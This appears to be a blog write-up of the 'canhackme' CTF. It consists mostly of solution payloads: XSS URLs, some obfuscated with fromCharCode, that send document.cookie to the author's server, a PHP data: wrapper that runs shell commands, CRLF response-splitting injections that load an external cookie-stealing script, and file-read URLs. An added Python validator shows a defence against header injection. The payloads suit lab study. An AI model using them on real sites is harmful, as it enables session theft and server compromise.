
canhackme

LimeLee 2019. 12. 30. 15:06


1 Misc challenge, 4 Server-Side challenges, 10 XSS challenges

Tips for the XSS challenges

The challenges themselves contain no hints at all; the only indication of what kind of challenge you are facing is the hashtags at the lower right of the challenge description page. Since the goal of each challenge is generally not spelled out, I am noting the parts I struggled with here.


1. If you submit to the tester page a URL containing an XSS script that redirects to your own server, you can see the cookie.

2. The tester page uses Google Chrome 68.0.3440.75, which has an XSS filter called Chrome Auditor (the XSS Auditor), so bypassing the XSS filter is mandatory.


Challenge payloads

JSON

https://json.canhack.me/?%3Cscript%3E=;document.location=%27https://limelee.xyz?%27%2bdocument.cookie;%3C/script%3E

babyphp

https://babyphp.canhack.me/?p=data:,%3C?=`ls`;%23

https://babyphp.canhack.me/?p=data:,%3C?=`cat%20a*`;%23

bbcode

https://bbcode.canhack.me/?code=[email][img][url]%20onerror=a=String.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(115)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(108)%2bString.fromCharCode(105)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(108)%2bString.fromCharCode(101)%2bString.fromCharCode(101)%2bString.fromCharCode(46)%2bString.fromCharCode(120)%2bString.fromCharCode(121)%2bString.fromCharCode(122)%2bString.fromCharCode(63);location.href=a%2bdocument.cookie;//%20[/url][/img]%20[/email]

Caesar

https://caesar.canhack.me/?text=%3Cpzofmq%20poz=eqqmp://zxbpxo.zxkexzh.jb/?qbuq=ilzxqflk.eobc=%22eqqmp://ifjbibb.uvw/?%22%2yalzrjbkq.zllhfb%26hbv=0%20%3E%3C/pzofmq%3E&key=3

Uppercase2

https://uppercase2.canhack.me/?text=<ſcript%20src=https://lowercase.canhack.me/?%26%23116%26%23101%26%23120%26%23116=location.href="https://limelee.xyz/?"%252bdocument.cookie></ſcript>

Lowercase

https://lowercase.canhack.me/?text=<scRipt%20sRC=HTTp://lowercase.canhack.me/?text=location.href=%27httP://limelee.xyz/?%27%252bdocument.cookie%20></SCRIPT>

redirect

https://redirect.canhack.me/?url=</script><svg><script>a=String.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(115)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(108)%2bString.fromCharCode(105)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(108)%2bString.fromCharCode(101)%2bString.fromCharCode(101)%2bString.fromCharCode(46)%2bString.fromCharCode(120)%2bString.fromCharCode(121)%2bString.fromCharCode(122)%2bString.fromCharCode(63);location.href=a%2bdocument.cookie;//

redirect2

https://redirect2.canhack.me/?url=%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Cscript/src=http://limelee.xyz/test.js%3E%3C/script%3E

test.js
location.href='https://limelee.xyz'+document.cookie
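The redirect2 payload above works because the url parameter is written into the Location header with CR/LF intact, so the response can be split and a second body injected. As an added defensive example (not from the original post or the challenge code; the allowlisted host is an assumption), this validator is what the redirect endpoint would need to run before emitting the header:

```python
from urllib.parse import unquote, urlsplit

# Hosts this application is willing to redirect to (constructed example allowlist).
ALLOWED_HOSTS = {"redirect2.canhack.me"}


def is_safe_redirect(raw_url: str) -> bool:
    """Return True only if raw_url may be placed in a Location header.

    Rejects:
      - CR, LF and other control characters (header injection / response splitting),
        checked after one percent-decoding pass, as a server would decode the value
      - scheme-relative (//host) and non-http(s) URLs
      - hosts outside ALLOWED_HOSTS (open redirect)
    """
    url = unquote(raw_url)  # one decoding pass; decode exactly as often as the server does
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 brackets
        return False
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if host is None or host.lower() not in ALLOWED_HOSTS:
        return False
    return True


if __name__ == "__main__":
    # Constructed inputs: an in-app target, the redirect2 payload from this writeup,
    # a raw CRLF, a scheme-relative target and a non-http scheme.
    samples = [
        "https://redirect2.canhack.me/home",
        "%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
        "%3Cscript/src=http://limelee.xyz/test.js%3E%3C/script%3E",
        "https://redirect2.canhack.me/x\r\nSet-Cookie: a=b",
        "//limelee.xyz/",
        "ftp://redirect2.canhack.me/",
    ]
    for s in samples:
        print(is_safe_redirect(s), repr(s[:40]))
```

Only the first sample is accepted; the rest are refused before any header is written.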

cat

https://cat.canhack.me/?file=index.php

https://cat.canhack.me/?file=fl$@ag-f72a161d445915d2bdcdc820c4143353.php

redirect3

https://redirect3.canhack.me/?url=//%27);-%0d%0a</script><script%20src=http://limelee.xyz/test.js>%0d%0a//

test.js
location.href='https://limelee.xyz'+document.cookie